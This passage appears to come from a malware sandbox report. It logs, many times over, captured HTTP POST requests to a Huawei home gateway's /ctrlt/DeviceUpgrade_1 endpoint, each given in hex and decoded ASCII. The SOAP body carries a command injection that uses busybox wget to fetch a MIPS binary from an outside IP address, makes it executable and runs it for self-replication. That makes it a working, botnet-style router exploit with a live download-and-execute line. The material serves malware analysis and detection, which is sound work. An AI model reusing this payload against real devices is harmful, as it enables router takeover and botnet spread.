73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 